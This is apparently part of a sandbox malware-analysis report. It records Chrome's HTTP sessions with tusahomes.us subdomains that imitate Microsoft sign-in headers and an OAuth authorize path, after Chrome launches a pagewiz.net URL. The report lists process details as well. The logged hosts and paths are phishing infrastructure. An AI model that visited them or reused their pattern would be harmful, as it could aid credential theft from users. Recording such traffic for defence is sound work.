                                                                2025-04-09 00:19:30 UTC153INData Raw: 7b 22 61 63 63 22 3a 31 2c 22 77 65 62 52 65 73 75 6c 74 22 3a 7b 22 6d 73 66 70 63 22 3a 22 47 55 49 44 3d 30 64 32 36 32 36 62 63 34 31 31 31 34 64 31 38 61 34 66 35 33 63 63 62 65 38 30 38 63 62 31 63 26 48 41 53 48 3d 30 64 32 36 26 4c 56 3d 32 30 32 35 30 34 26 56 3d 34 26 4c 55 3d 31 37 34 34 31 35 37 39 36 39 37 35 33 22 2c 22 6d 63 31 22 3a 22 30 64 32 36 32 36 62 63 34 31 31 31 34 64 31 38 61 34 66 35 33 63 63 62 65 38 30 38 63 62 31 63 22 7d 7d
                                                                Data Ascii: {"acc":1,"webResult":{"msfpc":"GUID=0d2626bc41114d18a4f53ccbe808cb1c&HASH=0d26&LV=202504&V=4&LU=1744157969753","mc1":"0d2626bc41114d18a4f53ccbe808cb1c"}}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.549777137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:29 UTC819OUTGET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0; ai_session=bqpsDU5foUOvqZ4wvqvplK|1744157961714|1744157961714
                                                                Sec-WebSocket-Key: USFm9cE1f7LkmHyCBwdidA==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2025-04-09 00:19:31 UTC719INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:31 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: 0532fe95-ff43-444c-8aaf-4b18cd822600
                                                                x-ms-ests-server: 2.1.20540.2 - EUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.549779137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:30 UTC522OUTGET /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                                Host: ab52444af96f49b7b110b6e3700ca950.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:33 UTC259INHTTP/1.1 405 Method Not Allowed
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:33 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 72
                                                                Connection: close
                                                                allow: OPTIONS,POST
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                2025-04-09 00:19:33 UTC72INData Raw: 7b 22 4d 65 73 73 61 67 65 22 3a 22 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 68 74 74 70 20 6d 65 74 68 6f 64 20 27 47 45 54 27 2e 22 7d
                                                                Data Ascii: {"Message":"The requested resource does not support http method 'GET'."}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.549784137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:46 UTC475OUTOPTIONS /api/report?catId=GW+estsfd+wst HTTP/1.1
                                                                Host: a4eaec44075f43d19af55316af4b7550.tusahomes.us
                                                                Connection: keep-alive
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:19:48 UTC413INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:48 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 7
                                                                Connection: close
                                                                access-control-allow-headers: content-type
                                                                access-control-allow-credentials: false
                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                access-control-allow-origin: *
                                                                set-cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; Domain=tusahomes.us; HttpOnly; Path=/; SameSite=none; Secure
                                                                2025-04-09 00:19:48 UTC7INData Raw: 4f 50 54 49 4f 4e 53
                                                                Data Ascii: OPTIONS


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.549785137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:46 UTC905OUTGET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0; ai_session=bqpsDU5foUOvqZ4wvqvplK|1744157961714|1744157961714; MSFPC=GUID=0d2626bc41114d18a4f53ccbe808cb1c&HASH=0d26&LV=202504&V=4&LU=1744157969753
                                                                Sec-WebSocket-Key: f/GzV9/frahr5k3ZuSSd3Q==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2025-04-09 00:19:48 UTC720INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:48 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: da5d7921-ba57-4aa5-a6aa-1545fcd92a00
                                                                x-ms-ests-server: 2.1.20540.2 - SCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                57192.168.2.549786137.184.178.231443
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:48 UTC451OUTPOST /api/report?catId=GW+estsfd+wst HTTP/1.1
                                                                Host: a4eaec44075f43d19af55316af4b7550.tusahomes.us
                                                                Connection: keep-alive
                                                                Content-Length: 1341
                                                                Content-Type: application/reports+json
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:19:48 UTC1341OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 31 37 30 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 35 31 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 33 33 30 63 36 38 66 32 39 30 33 30 34 34 66 64 61 66 30 33 39 30 65 39 34 34 62 37 30 39 32 64 2e 74 75 73 61 68 6f 6d 65 73 2e 75 73 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69
                                                                Data Ascii: [{"age":41704,"body":{"elapsed_time":2518,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri
                                                                2025-04-09 00:19:50 UTC533INHTTP/1.1 429 Too Many Requests
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:50 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
                                                                request-context: appId=cid-v1:c242839f-7b23-4fcd-8b70-f19e1d322576
                                                                access-control-allow-credentials: false
                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                access-control-allow-origin: *
                                                                set-cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; Domain=tusahomes.us; HttpOnly; Path=/; SameSite=none; Secure


                                                                020406080s020406080100

                                                                Click to jump to process

                                                                020406080s0.0050100MB

                                                                Click to jump to process

                                                                Target ID:1
                                                                Start time:20:18:17
                                                                Start date:08/04/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                Imagebase:0x7ff717390000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:20:18:23
                                                                Start date:08/04/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2368 /prefetch:3
                                                                Imagebase:0x7ff717390000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:20:18:26
                                                                Start date:08/04/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5056 /prefetch:8
                                                                Imagebase:0x7ff717390000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:12
                                                                Start time:20:18:29
                                                                Start date:08/04/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://p1.pagewiz.net/vericastharlandclarke/"
                                                                Imagebase:0x7ff717390000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true
                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                No disassembly